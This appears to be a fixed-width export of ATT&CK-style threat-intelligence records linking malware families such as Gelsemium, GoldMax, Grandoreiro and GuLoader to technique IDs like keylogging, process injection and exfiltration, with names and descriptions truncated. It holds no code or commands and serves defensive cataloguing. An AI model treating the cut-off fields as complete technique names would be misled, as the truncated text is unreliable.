S1044 FunnyDre malware-- software uses T1070 Indicator attack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1105 Ingress Tooattack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1056.001Keyloggingattack-pat technique The [Funny
S1044 FunnyDre malware-- software uses T1074.001Local Data attack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1036.004Masquerade attack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1106 Native API attack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1095 Non-Applicattack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1120 Peripheral attack-pat technique The [Funny
S1044 FunnyDre malware-- software uses T1057 Process Di attack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1572 Protocol T attack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1090 Proxy attack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1012 Query Regiattack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1547.001Registry Ruattack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1018 Remote Sysattack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1218.011Rundll32 attack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1113 Screen Capattack-pat technique The [Funny
S1044 FunnyDre malware-- software uses T1518.001Security S attack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1082 System Inf attack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1016 System Netattack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1033 System Own attack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1124 System Timattack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1059.003Windows Cattack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1047 Windows M attack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1543.003Windows Se attack-pat technique [FunnyDrea
S0410 Fysbis malware-- software uses T1027.013Encrypted/attack-pat technique [Fysbis](ht
S0410 Fysbis malware-- software uses T1070.004File Deleti attack-pat technique [Fysbis](ht
S0410 Fysbis malware-- software uses T1083 File and Di attack-pat technique [Fysbis](ht
S0410 Fysbis malware-- software uses T1056.001Keyloggingattack-pat technique [Fysbis](ht
S0410 Fysbis malware-- software uses T1036.004Masquerade attack-pat technique [Fysbis](ht
S0410 Fysbis malware-- software uses T1036.005Match Legiattack-pat technique [Fysbis](ht
S0410 Fysbis malware-- software uses T1057 Process Di attack-pat technique [Fysbis](ht
S0410 Fysbis malware-- software uses T1132.001Standard Eattack-pat technique [Fysbis](ht
S0410 Fysbis malware-- software uses T1082 System Inf attack-pat technique [Fysbis](h
S0410 Fysbis malware-- software uses T1543.002Systemd Seattack-pat technique [Fysbis](ht
S0410 Fysbis malware-- software uses T1059.004Unix Shell attack-pat technique [Fysbis](ht
S0410 Fysbis malware-- software uses T1547.013XDG Autostattack-pat technique If executin
S1117 GLASSTOK malware--5software uses T1140 Deobfuscatattack-pat technique [GLASSTOKEN
S1117 GLASSTOK malware--5software uses T1059.001PowerShellattack-pat technique [GLASSTOKE
S1117 GLASSTOK malware--5software uses T1132.001Standard Eattack-pat technique [GLASSTOKE
S1117 GLASSTOK malware--5software uses T1505.003Web Shell attack-pat technique [GLASSTOKEN
S0026 GLOOXMAImalware--fsoftware uses T1102.002Bidirectio attack-pat technique [GLOOXMAIL
S0026 GLOOXMAImalware--fsoftware uses T1071.005Publish/Subattack-pat technique [GLOOXMAIL
S0417 GRIFFON malware--0software uses T1069.002Domain Grattack-pat technique [GRIFFON](
S0417 GRIFFON malware--0software uses T1059.007JavaScript attack-pat technique [GRIFFON](h
S0417 GRIFFON malware--0software uses T1059.001PowerShellattack-pat technique [GRIFFON](
S0417 GRIFFON malware--0software uses T1547.001Registry Ruattack-pat technique [GRIFFON](h
S0417 GRIFFON malware--0software uses T1053.005Scheduled attack-pat technique [GRIFFON](h
S0417 GRIFFON malware--0software uses T1113 Screen Capattack-pat technique [GRIFFON](h
S0417 GRIFFON malware--0software uses T1082 System Inf attack-pat technique [GRIFFON](h
S0417 GRIFFON malware--0software uses T1124 System Timattack-pat technique [GRIFFON](h
S0168 Gazer malware-- software uses T1573.002Asymmetricattack-pat technique [Gazer](htt
S0168 Gazer malware-- software uses T1553.002Code Signi attack-pat technique [Gazer](htt
S0168 Gazer malware-- software uses T1027.013Encrypted/attack-pat technique [Gazer](htt
S0168 Gazer malware-- software uses T1070.004File Deleti attack-pat technique [Gazer](htt
S0168 Gazer malware-- software uses T1105 Ingress Tooattack-pat technique [Gazer](htt
S0168 Gazer malware-- software uses T1480.002Mutual Excattack-pat technique [Gazer](ht
S0168 Gazer malware-- software uses T1564.004NTFS File Aattack-pat technique [Gazer](htt
S0168 Gazer malware-- software uses T1055 Process Injattack-pat technique [Gazer](htt
S0168 Gazer malware-- software uses T1547.001Registry Ruattack-pat technique [Gazer](htt
S0168 Gazer malware-- software uses T1053.005Scheduled attack-pat technique [Gazer](htt
S0168 Gazer malware-- software uses T1546.002Screensaveattack-pat technique [Gazer](htt
S0168 Gazer malware-- software uses T1547.009Shortcut Mattack-pat technique [Gazer](htt
S0168 Gazer malware-- software uses T1573.001Symmetric attack-pat technique [Gazer](htt
S0168 Gazer malware-- software uses T1033 System Own attack-pat technique [Gazer](htt
S0168 Gazer malware-- software uses T1055.003Thread Exeattack-pat technique [Gazer](htt
S0168 Gazer malware-- software uses T1070.006Timestompattack-pat technique For early [
S0168 Gazer malware-- software uses T1071.001Web Protocattack-pat technique [Gazer](htt
S0168 Gazer malware-- software uses T1547.004Winlogon Hattack-pat technique [Gazer](ht
S0666 Gelsemiummalware--esoftware uses T1134 Access Tokattack-pat technique [Gelsemium
S0666 Gelsemiummalware--esoftware uses T1027.001Binary Padattack-pat technique [Gelsemium
S0666 Gelsemiummalware--esoftware uses T1548.002Bypass Useattack-pat technique [Gelsemium
S0666 Gelsemiummalware--esoftware uses T1559.001Componentattack-pat technique [Gelsemium]
S0666 Gelsemiummalware--esoftware uses T1071.004DNS attack-pat technique [Gelsemium
S0666 Gelsemiummalware--esoftware uses T1005 Data from attack-pat technique [Gelsemium
S0666 Gelsemiummalware--esoftware uses T1140 Deobfuscatattack-pat technique [Gelsemium
S0666 Gelsemiummalware--esoftware uses T1568 Dynamic Reattack-pat technique [Gelsemium
S0666 Gelsemiummalware--esoftware uses T1055.001Dynamic-linattack-pat technique [Gelsemium]
S0666 Gelsemiummalware--esoftware uses T1027.013Encrypted/attack-pat technique [Gelsemium
S0666 Gelsemiummalware--esoftware uses T1008 Fallback C attack-pat technique [Gelsemium
S0666 Gelsemiummalware--esoftware uses T1070.004File Deleti attack-pat technique [Gelsemium
S0666 Gelsemiummalware--esoftware uses T1083 File and Di attack-pat technique [Gelsemium]
S0666 Gelsemiummalware--esoftware uses T1027.011Fileless St attack-pat technique [Gelsemium
S0666 Gelsemiummalware--esoftware uses T1105 Ingress Tooattack-pat technique [Gelsemium
S0666 Gelsemiummalware--esoftware uses T1036.001Invalid Codattack-pat technique [Gelsemium
S0666 Gelsemiummalware--esoftware uses T1036.005Match Legiattack-pat technique [Gelsemium]
S0666 Gelsemiummalware--esoftware uses T1112 Modify Regattack-pat technique [Gelsemium
S0666 Gelsemiummalware--esoftware uses T1106 Native API attack-pat technique [Gelsemium]
S0666 Gelsemiummalware--esoftware uses T1095 Non-Applicattack-pat technique [Gelsemium
S0666 Gelsemiummalware--esoftware uses T1547.012Print Proceattack-pat technique [Gelsemium
S0666 Gelsemiummalware--esoftware uses T1057 Process Di attack-pat technique [Gelsemium
S0666 Gelsemiummalware--esoftware uses T1012 Query Regiattack-pat technique [Gelsemium
S0666 Gelsemiummalware--esoftware uses T1620 Reflective attack-pat technique [Gelsemium
S0666 Gelsemiummalware--esoftware uses T1547.001Registry Ruattack-pat technique [Gelsemium]
S0666 Gelsemiummalware--esoftware uses T1518.001Security S attack-pat technique [Gelsemium]
S0666 Gelsemiummalware--esoftware uses T1082 System Inf attack-pat technique [Gelsemium
S0666 Gelsemiummalware--esoftware uses T1033 System Own attack-pat technique [Gelsemium
S0666 Gelsemiummalware--esoftware uses T1070.006Timestompattack-pat technique [Gelsemium]
S0666 Gelsemiummalware--esoftware uses T1497 Virtualiza attack-pat technique [Gelsemium
S0666 Gelsemiummalware--esoftware uses T1071.001Web Protocattack-pat technique [Gelsemium
S0666 Gelsemiummalware--esoftware uses T1059.003Windows Cattack-pat technique [Gelsemium]
S0666 Gelsemiummalware--esoftware uses T1543.003Windows Se attack-pat technique [Gelsemium]
S0049 GeminiDukmalware-- software uses T1083 File and Di attack-pat technique [GeminiDuke
S0049 GeminiDukmalware-- software uses T1087.001Local Acco attack-pat technique [GeminiDuke
S0049 GeminiDukmalware-- software uses T1057 Process Di attack-pat technique [GeminiDuke
S0049 GeminiDukmalware-- software uses T1016 System Netattack-pat technique [GeminiDuke
S0049 GeminiDukmalware-- software uses T1007 System Serattack-pat technique [GeminiDuke
S0049 GeminiDukmalware-- software uses T1071.001Web Protocattack-pat technique [GeminiDuk
S0460 Get2 malware-- software uses T1059 Command attack-pat
an technique [Get2](http
S0460 Get2 malware-- software uses T1055.001Dynamic-linattack-pat technique [Get2](http
S0460 Get2 malware-- software uses T1057 Process Di attack-pat technique [Get2](http
S0460 Get2 malware-- software uses T1082 System Inf attack-pat technique [Get2](http
S0460 Get2 malware-- software uses T1033 System Own attack-pat technique [Get2](http
S0460 Get2 malware-- software uses T1071.001Web Protocattack-pat technique [Get2](http
S0249 Gold Dragomalware-- software uses T1560 Archive Coattack-pat technique [Gold Drag
S0249 Gold Dragomalware-- software uses T1562.001Disable or attack-pat technique [Gold Drag
S0249 Gold Dragomalware-- software uses T1070.004File Deleti attack-pat technique [Gold Drago
S0249 Gold Dragomalware-- software uses T1083 File and Di attack-pat technique [Gold Drago
S0249 Gold Dragomalware-- software uses T1105 Ingress Tooattack-pat technique [Gold Drag
S0249 Gold Dragomalware-- software uses T1074.001Local Data attack-pat technique [Gold Drag
S0249 Gold Dragomalware-- software uses T1057 Process Di attack-pat technique [Gold Drag
S0249 Gold Dragomalware-- software uses T1012 Query Regiattack-pat technique [Gold Drag
S0249 Gold Dragomalware-- software uses T1547.001Registry Ruattack-pat technique [Gold Drago
S0249 Gold Dragomalware-- software uses T1518.001Security S attack-pat technique [Gold Drag
S0249 Gold Dragomalware-- software uses T1082 System Inf attack-pat technique [Gold Drag
S0249 Gold Dragomalware-- software uses T1033 System Own attack-pat technique [Gold Drago
S0249 Gold Dragomalware-- software uses T1071.001Web Protocattack-pat technique [Gold Drag
S0249 Gold Dragomalware-- software uses T1059.003Windows Cattack-pat technique [Gold Drag
S0597 GoldFindermalware-- software uses T1119 Automatedattack-pat technique [GoldFinde
S0597 GoldFindermalware-- software uses T1016.001Internet C attack-pat technique [GoldFinde
S0597 GoldFindermalware-- software uses T1071.001Web Protocattack-pat technique [GoldFinde
S0588 GoldMax malware--5software uses T1573.002Asymmetricattack-pat technique [GoldMax](
S0588 GoldMax malware--5software uses T1053.003Cron attack-pat technique The [GoldMa
S0588 GoldMax malware--5software uses T1140 Deobfuscatattack-pat technique [GoldMax](
S0588 GoldMax malware--5software uses T1027.013Encrypted/attack-pat technique [GoldMax](
S0588 GoldMax malware--5software uses T1041 Exfiltratio attack-pat technique [GoldMax](
S0588 GoldMax malware--5software uses T1564.011Ignore Procattack-pat technique The [GoldMa
S0588 GoldMax malware--5software uses T1105 Ingress Tooattack-pat technique [GoldMax](
S0588 GoldMax malware--5software uses T1001.001Junk Data attack-pat technique [GoldMax](h
S0588 GoldMax malware--5software uses T1036.004Masquerade attack-pat technique [GoldMax](
S0588 GoldMax malware--5software uses T1036.005Match Legiattack-pat technique [GoldMax](
S0588 GoldMax malware--5software uses T1053.005Scheduled attack-pat technique [GoldMax](
S0588 GoldMax malware--5software uses T1027.002Software Pattack-pat technique [GoldMax](
S0588 GoldMax malware--5software uses T1497.001System Cheattack-pat technique [GoldMax](
S0588 GoldMax malware--5software uses T1016 System Netattack-pat technique [GoldMax](h
S0588 GoldMax malware--5software uses T1124 System Timattack-pat technique [GoldMax](
S0588 GoldMax malware--5software uses T1497.003Time Basedattack-pat technique [GoldMax](
S0588 GoldMax malware--5software uses T1071.001Web Protocattack-pat technique [GoldMax](
S0588 GoldMax malware--5software uses T1059.003Windows Cattack-pat technique [GoldMax](
S0493 GoldenSpymalware--bsoftware uses T1195.002Compromise attack-pat technique [GoldenSpy
S0493 GoldenSpymalware--bsoftware uses T1027.013Encrypted/attack-pat technique [GoldenSpy]
S0493 GoldenSpymalware--bsoftware uses T1041 Exfiltratio attack-pat technique [GoldenSpy]
S0493 GoldenSpymalware--bsoftware uses T1070.004File Deleti attack-pat technique [GoldenSpy]
S0493 GoldenSpymalware--bsoftware uses T1083 File and Di attack-pat technique [GoldenSpy]
S0493 GoldenSpymalware--bsoftware uses T1105 Ingress Tooattack-pat technique [GoldenSpy]
S0493 GoldenSpymalware--bsoftware uses T1136.001Local Acco attack-pat technique [GoldenSpy
S0493 GoldenSpymalware--bsoftware uses T1036.005Match Legiattack-pat technique [GoldenSpy
S0493 GoldenSpymalware--bsoftware uses T1106 Native API attack-pat technique [GoldenSpy
S0493 GoldenSpymalware--bsoftware uses T1571 Non-Standaattack-pat technique [GoldenSpy
S0493 GoldenSpymalware--bsoftware uses T1082 System Inf attack-pat technique [GoldenSpy
S0493 GoldenSpymalware--bsoftware uses T1497.003Time Basedattack-pat technique [GoldenSpy]
S0493 GoldenSpymalware--bsoftware uses T1071.001Web Protocattack-pat technique [GoldenSpy]
S0493 GoldenSpymalware--bsoftware uses T1059.003Windows Cattack-pat technique [GoldenSpy
S0493 GoldenSpymalware--bsoftware uses T1543.003Windows Se attack-pat technique [GoldenSpy]
S0477 Goopy malware-- software uses T1027.001Binary Padattack-pat technique [Goopy](htt
S0477 Goopy malware-- software uses T1070.008Clear Mail attack-pat technique [Goopy](htt
S0477 Goopy malware-- software uses T1574.002DLL Side-L attack-pat technique [Goopy](htt
S0477 Goopy malware-- software uses T1071.004DNS attack-pat technique [Goopy](htt
S0477 Goopy malware-- software uses T1005 Data from attack-pat technique [Goopy](htt
S0477 Goopy malware-- software uses T1140 Deobfuscatattack-pat technique [Goopy](htt
S0477 Goopy malware-- software uses T1562.001Disable or attack-pat technique [Goopy](htt
S0477 Goopy malware-- software uses T1041 Exfiltratio attack-pat technique [Goopy](htt
S0477 Goopy malware-- software uses T1071.003Mail Protocattack-pat technique [Goopy](htt
S0477 Goopy malware-- software uses T1036.005Match Legiattack-pat technique [Goopy](ht
S0477 Goopy malware-- software uses T1106 Native API attack-pat technique [Goopy](ht
S0477 Goopy malware-- software uses T1027 Obfuscatedattack-pat technique [Goopy](htt
S0477 Goopy malware-- software uses T1057 Process Di attack-pat technique [Goopy](htt
S0477 Goopy malware-- software uses T1053.005Scheduled attack-pat technique [Goopy](htt
S0477 Goopy malware-- software uses T1033 System Own attack-pat technique [Goopy](htt
S0477 Goopy malware-- software uses T1059.005Visual Basiattack-pat technique [Goopy](htt
S0477 Goopy malware-- software uses T1071.001Web Protocattack-pat technique [Goopy](htt
S0477 Goopy malware-- software uses T1059.003Windows Cattack-pat technique [Goopy](htt
S1138 Gootloadermalware-- software uses T1140 Deobfuscatattack-pat technique [Gootloader
S1138 Gootloadermalware-- software uses T1069.002Domain Grattack-pat technique [Gootloade
S1138 Gootloadermalware-- software uses T1584.001Domains attack-pat technique [Gootloade
S1138 Gootloadermalware-- software uses T1105 Ingress Tooattack-pat technique [Gootloade
S1138 Gootloadermalware-- software uses T1059.007JavaScript attack-pat technique [Gootloader
S1138 Gootloadermalware-- software uses T1204.001Malicious Lattack-pat technique [Gootloader
S1138 Gootloadermalware-- software uses T1027 Obfuscatedattack-pat technique The [Gootloader](https://atta
S1138 Gootloadermalware-- software uses T1055.002Portable Exattack-pat technique [Gootloader](https://attack.m
S1138 Gootloadermalware-- software uses T1059.001PowerShellattack-pat technique [Gootloader
S1138 Gootloadermalware-- software uses T1055.012Process Hoattack-pat technique [Gootloader
S1138 Gootloadermalware-- software uses T1547.001Registry Ruattack-pat technique [Gootloader
S1138 Gootloadermalware-- software uses T1132.001Standard Eattack-pat technique [Gootloade
S1138 Gootloadermalware-- software uses T1082 System Inf attack-pat technique [Gootloader
S1138 Gootloadermalware-- software uses T1614.001System Lanattack-pat technique [Gootloader
S1138 Gootloadermalware-- software uses T1614 System Locattack-pat technique [Gootloader
S1138 Gootloadermalware-- software uses T1016 System Netattack-pat technique [Gootloader
S1138 Gootloadermalware-- software uses T1497.003Time Basedattack-pat technique [Gootloader
S1138 Gootloadermalware-- software uses T1584.006Web Servicattack-pat technique [Gootloade
S0531 Grandoreirmalware-- software uses T1010 Applicatio attack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1573.002Asymmetricattack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1102.002Bidirectio attack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1027.001Binary Padattack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1176 Browser Exattack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1185 Browser Seattack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1548.002Bypass Useattack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1115 Clipboard attack-pat technique [Grandorei
S0531 Grandoreirmalware-- software uses T1555.003Credential attack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1102.001Dead Dropattack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1140 Deobfuscatattack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1562.004Disable or attack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1562.001Disable or attack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1568.002Domain Gen attack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1189 Drive-by C attack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1087.003Email Accoattack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1027.013Encrypted/attack-pat technique The [Grando
S0531 Grandoreirmalware-- software uses T1041 Exfiltratio attack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1070.004File Deleti attack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1027.011Fileless St attack-pat technique [Grandorei
S0531 Grandoreirmalware-- software uses T1105 Ingress Tooattack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1056.001Keyloggingattack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1204.002Malicious Fattack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1204.001Malicious Lattack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1036.005Match Legiattack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1112 Modify Regattack-pat technique [Grandorei
S0531 Grandoreirmalware-- software uses T1218.007Msiexec attack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1106 Native API attack-pat technique [Grandorei
S0531 Grandoreirmalware-- software uses T1057 Process Di attack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1547.001Registry Ruattack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1518.001Security S attack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1547.009Shortcut Mattack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1566.002Spearphishattack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1539 Steal Web attack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1497.001System Cheattack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1082 System Inf attack-pat technique [Grandorei
S0531 Grandoreirmalware-- software uses T1016 System Netattack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1033 System Own attack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1124 System Timattack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1059.005Visual Basiattack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1071.001Web Protocattack-pat technique [Grandoreir
S0531 Grandoreirmalware-- software uses T1222.001Windows Fiattack-pat technique [Grandoreir
S0237 GravityRATmalware-- software uses T1005 Data from attack-pat technique [GravityRAT
S0237 GravityRATmalware-- software uses T1025 Data from attack-pat technique [GravityRAT
S0237 GravityRATmalware-- software uses T1559.002Dynamic Daattack-pat technique [GravityRAT
S0237 GravityRATmalware-- software uses T1027.013Encrypted/attack-pat technique [GravityRAT
S0237 GravityRATmalware-- software uses T1083 File and Di attack-pat technique [GravityRAT
S0237 GravityRATmalware-- software uses T1027.005Indicator attack-pat technique The author
S0237 GravityRATmalware-- software uses T1571 Non-Standaattack-pat technique [GravityRAT
S0237 GravityRATmalware-- software uses T1057 Process Di attack-pat technique [GravityRAT
S0237 GravityRATmalware-- software uses T1053.005Scheduled attack-pat technique [GravityRAT
S0237 GravityRATmalware-- software uses T1497.001System Cheattack-pat technique [GravityRAT
S0237 GravityRATmalware-- software uses T1082 System Inf attack-pat technique [GravityRA
S0237 GravityRATmalware-- software uses T1016 System Netattack-pat technique [GravityRAT
S0237 GravityRATmalware-- software uses T1049 System Netattack-pat technique [GravityRA
S0237 GravityRATmalware-- software uses T1033 System Own attack-pat technique [GravityRAT
S0237 GravityRATmalware-- software uses T1007 System Serattack-pat technique [GravityRAT
S0237 GravityRATmalware-- software uses T1124 System Timattack-pat technique [GravityRAT
S0237 GravityRATmalware-- software uses T1071.001Web Protocattack-pat technique [GravityRAT
S0237 GravityRATmalware-- software uses T1059.003Windows Cattack-pat technique [GravityRA
S0237 GravityRATmalware-- software uses T1047 Windows M attack-pat technique [GravityRAT
S0690 Green Lammalware-- software uses T1071.004DNS attack-pat technique [Green Lam
S0690 Green Lammalware-- software uses T1005 Data from attack-pat technique [Green Lam
S0690 Green Lammalware-- software uses T1140 Deobfuscatattack-pat technique [Green Lamb
S0690 Green Lammalware-- software uses T1070.004File Deleti attack-pat technique [Green Lamb
S0690 Green Lammalware-- software uses T1555.001Keychain attack-pat technique [Green Lam
S0690 Green Lammalware-- software uses T1543.001Launch Ageattack-pat technique [Green Lamb
S0690 Green Lammalware-- software uses T1543.004Launch Da attack-pat technique [Green Lamb
S0690 Green Lammalware-- software uses T1547.015Login Itemattack-pat technique [Green Lamb
S0690 Green Lammalware-- software uses T1036.004Masquerade attack-pat technique [Green Lam
S0690 Green Lammalware-- software uses T1036.005Match Legiattack-pat technique [Green Lamb
S0690 Green Lammalware-- software uses T1027 Obfuscatedattack-pat technique [Green Lamb
S0690 Green Lammalware-- software uses T1090 Proxy attack-pat technique [Green Lamb
S0690 Green Lammalware-- software uses T1037.004RC Scripts attack-pat technique [Green Lamb
S0690 Green Lammalware-- software uses T1082 System Inf attack-pat technique [Green Lamb
S0690 Green Lammalware-- software uses T1016 System Netattack-pat technique [Green Lamb
S0690 Green Lammalware-- software uses T1124 System Timattack-pat technique [Green Lam
S0690 Green Lammalware-- software uses T1059.004Unix Shell attack-pat technique [Green Lamb
S0690 Green Lammalware-- software uses T1546.004Unix Shell attack-pat technique [Green Lamb
S0342 GreyEnerg malware-- software uses T1573.002Asymmetricattack-pat technique [GreyEnerg
S0342 GreyEnerg malware-- software uses T1553.002Code Signi attack-pat technique [GreyEnergy
S0342 GreyEnerg malware-- software uses T1027.013Encrypted/attack-pat technique [GreyEnergy
S0342 GreyEnerg malware-- software uses T1070.004File Deleti attack-pat technique [GreyEnergy
S0342 GreyEnerg malware-- software uses T1105 Ingress Tooattack-pat technique [GreyEnerg
S0342 GreyEnerg malware-- software uses T1056.001Keyloggingattack-pat technique [GreyEnerg
S0342 GreyEnerg malware-- software uses T1003.001LSASS Memattack-pat technique [GreyEnergy
S0342 GreyEnerg malware-- software uses T1112 Modify Regattack-pat technique [GreyEnergy
S0342 GreyEnerg malware-- software uses T1090.003Multi-hop attack-pat technique [GreyEnergy
S0342 GreyEnerg malware-- software uses T1055.002Portable Exattack-pat technique [GreyEnergy
S0342 GreyEnerg malware-- software uses T1218.011Rundll32 attack-pat technique [GreyEnergy
S0342 GreyEnerg malware-- software uses T1027.002Software Pattack-pat technique [GreyEnergy
S0342 GreyEnerg malware-- software uses T1573.001Symmetric attack-pat technique [GreyEnerg
S0342 GreyEnerg malware-- software uses T1007 System Serattack-pat technique [GreyEnerg
S0342 GreyEnerg malware-- software uses T1071.001Web Protocattack-pat technique [GreyEnerg
S0342 GreyEnerg malware-- software uses T1059.003Windows Cattack-pat technique [GreyEnerg
S0342 GreyEnerg malware-- software uses T1543.003Windows Se attack-pat technique [GreyEnergy
S0632 GrimAgentmalware--csoftware uses T1573.002Asymmetricattack-pat technique [GrimAgent]
S0632 GrimAgentmalware--csoftware uses T1027.001Binary Padattack-pat technique [GrimAgent]
S0632 GrimAgentmalware--csoftware uses T1070.009Clear Persiattack-pat technique [GrimAgent]
S0632 GrimAgentmalware--csoftware uses T1005 Data from attack-pat technique [GrimAgent]
S0632 GrimAgentmalware--csoftware uses T1140 Deobfuscatattack-pat technique [GrimAgent]
S0632 GrimAgentmalware--csoftware uses T1041 Exfiltratio attack-pat technique [GrimAgent]
S0632 GrimAgentmalware--csoftware uses T1070.004File Deleti attack-pat technique [GrimAgent]
S0632 GrimAgentmalware--csoftware uses T1083 File and Di attack-pat technique [GrimAgent]
S0632 GrimAgentmalware--csoftware uses T1105 Ingress Tooattack-pat technique [GrimAgent]
S0632 GrimAgentmalware--csoftware uses T1001.001Junk Data attack-pat technique [GrimAgent
S0632 GrimAgentmalware--csoftware uses T1480.002Mutual Excattack-pat technique [GrimAgent]
S0632 GrimAgentmalware--csoftware uses T1106 Native API attack-pat technique [GrimAgent
S0632 GrimAgentmalware--csoftware uses T1027 Obfuscatedattack-pat technique [GrimAgent]
S0632 GrimAgentmalware--csoftware uses T1547.001Registry Ruattack-pat technique [GrimAgent]
S0632 GrimAgentmalware--csoftware uses T1053.005Scheduled attack-pat technique [GrimAgent]
S0632 GrimAgentmalware--csoftware uses T1132.001Standard Eattack-pat technique [GrimAgent
S0632 GrimAgentmalware--csoftware uses T1573.001Symmetric attack-pat technique [GrimAgent
S0632 GrimAgentmalware--csoftware uses T1082 System Inf attack-pat technique [GrimAgent]
S0632 GrimAgentmalware--csoftware uses T1614.001System Lanattack-pat technique [GrimAgent
S0632 GrimAgentmalware--csoftware uses T1614 System Locattack-pat technique [GrimAgent
S0632 GrimAgentmalware--csoftware uses T1016 System Netattack-pat technique [GrimAgent
S0632 GrimAgentmalware--csoftware uses T1033 System Own attack-pat technique [GrimAgent]
S0632 GrimAgentmalware--csoftware uses T1497.003Time Basedattack-pat technique [GrimAgent]
S0632 GrimAgentmalware--csoftware uses T1071.001Web Protocattack-pat technique [GrimAgent]
S0632 GrimAgentmalware--csoftware uses T1059.003Windows Cattack-pat technique [GrimAgent
S0561 GuLoader malware-- software uses T1070.004File Deleti attack-pat technique [GuLoader]
S0561 GuLoader malware-- software uses T1105 Ingress Tooattack-pat technique [GuLoader]
S0561 GuLoader malware-- software uses T1204.002Malicious Fattack-pat technique The [GuLoa
S0561 GuLoader malware-- software uses T1204.001Malicious Lattack-pat technique [GuLoader](
S0561 GuLoader malware-- software uses T1106 Native API attack-pat technique [GuLoader](
S0561 GuLoader malware-- software uses T1055 Process Injattack-pat technique [GuLoader](
S0561 GuLoader malware-- software uses T1547.001Registry Ruattack-pat technique [GuLoader]
S0561 GuLoader malware-- software uses T1566.002Spearphishattack-pat technique [GuLoader](
S0561 GuLoader malware-- software uses T1497.001System Cheattack-pat technique [GuLoader]
S0561 GuLoader malware-- software uses T1497.003Time Basedattack-pat technique [GuLoader](
S0561 GuLoader malware-- software uses T1071.001Web Protocattack-pat technique [GuLoader](
S0561 GuLoader malware-- software uses T1102 Web Servicattack-pat technique [GuLoader]
S0132 H1N1 malware-- software uses T1548.002Bypass Useattack-pat technique [H1N1](http
S0132 H1N1 malware-- software uses T1555.003Credential attack-pat technique [H1N1](htt
S0132 H1N1 malware-- software uses T1132 Data Encodattack-pat technique [H1N1](http
S0132 H1N1 malware-- software uses T1562.004Disable or attack-pat technique [H1N1](http
S0132 H1N1 malware-- software uses T1562.001Disable or attack-pat technique [H1N1](http
S0132 H1N1 malware-- software uses T1105 Ingress Tooattack-pat technique [H1N1](htt
S0132 H1N1 malware-- software uses T1490 Inhibit Sy attack-pat technique [H1N1](http
S0132 H1N1 malware-- software uses T1027 Obfuscatedattack-pat technique [H1N1](http
S0132 H1N1 malware-- software uses T1091 Replicatio attack-pat technique [H1N1](http
S0132 H1N1 malware-- software uses T1027.002Software Pattack-pat technique [H1N1](http
S0132 H1N1 malware-- software uses T1573.001Symmetric attack-pat technique [H1N1](http
S0132 H1N1 malware-- software uses T1080 Taint Shar attack-pat technique [H1N1](http
S0132 H1N1 malware-- software uses T1059.003Windows Cattack-pat technique [H1N1](http
S0151 HALFBAKE malware-- software uses T1070.004File Deleti attack-pat technique [HALFBAKED]
S0151 HALFBAKE malware-- software uses T1059.001PowerShellattack-pat technique [HALFBAKED]
S0151 HALFBAKE malware-- software uses T1057 Process Di attack-pat technique [HALFBAKED]
S0151 HALFBAKE malware-- software uses T1113 Screen Capattack-pat technique [HALFBAKED]
S0151 HALFBAKE malware-- software uses T1082 System Inf attack-pat technique [HALFBAKED]
S0151 HALFBAKE malware-- software uses T1047 Windows M attack-pat technique [HALFBAKED
S0037 HAMMERTmalware-- software uses T1567.002Exfiltratio attack-pat technique [HAMMERTOSS
